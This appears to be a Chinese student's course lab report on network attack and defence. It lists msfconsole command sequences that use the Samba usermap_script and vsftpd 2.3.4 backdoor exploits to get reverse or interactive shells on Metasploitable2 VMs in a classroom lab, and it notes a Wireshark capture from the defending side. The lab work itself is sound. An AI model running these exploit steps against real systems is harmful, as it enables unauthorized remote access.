20231913 2023-2024-2 《网络攻防实践》实践七报告

20231913 2023-2024-2 《网络攻防实践》实践七报告

1.实践过程

1.1 使用Metasploit进行Linux远程渗透攻击

输入msfconsole启动msfconsole
在这里插入图片描述
输入search usermap_script
在这里插入图片描述
输入use exploit/multi/samba/usermap_script
然后输入show payloads显示此漏洞的载荷
在这里插入图片描述
输入set payload cmd/unix/reverse
输入 set LHOST 192.168.236.251 (kali) 和 set RHOST 192.168.236.241(Metasploitable2_Linux)
在这里插入图片描述
渗透成功
在这里插入图片描述

1.2 实践作业:攻防对抗实践

(1)进攻
我的kali作为攻击机 ip192.168.236.251(20231913ZC)
YZY的metasploitable2-linux作为靶机 ip192.168.236.1(20231914TYZY)
ip地址如下
在这里插入图片描述

在这里插入图片描述
可以ping通
在这里插入图片描述
输入命令msfconsole启动,并输入search vsftp查找vsftp漏洞
在这里插入图片描述

在这里插入图片描述
输入
use exploit/unix/ftp/vsftpd_234_backdoor
show payloads
set payloads payload/cmd/unix/interact
set RHOST 192.168.236.1
set LHOST 192.168.1236.251

在这里插入图片描述
输入exploit,发现成功渗透,获得防守方靶机控制权
在这里插入图片描述
(2)防守
我作为防守方 防守机metasploitable2-linux ip192.168.236.241(20231913ZC)
攻击机kali ip192.168.236.20(20231914YZY)
可以ping通
靶机ip地址如下
在这里插入图片描述
YZY同学重复之前的步骤渗透我的靶机,我在wireshark中抓到了该数据包如下
在这里插入图片描述

在这里插入图片描述

2.学习中遇到的问题及解决

  • 问题1:我在防守的时候一直ping不通
  • 问题1解决方案:原来是插着网线,没有和YZY的电脑连接在一个网段下

3.实践总结

本次实践的内容不多,和上一次实践过程比较相似,我下载了一个新的虚拟机metasploitable2-linux,了解了Linux的远程渗透攻击。

参考资料

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值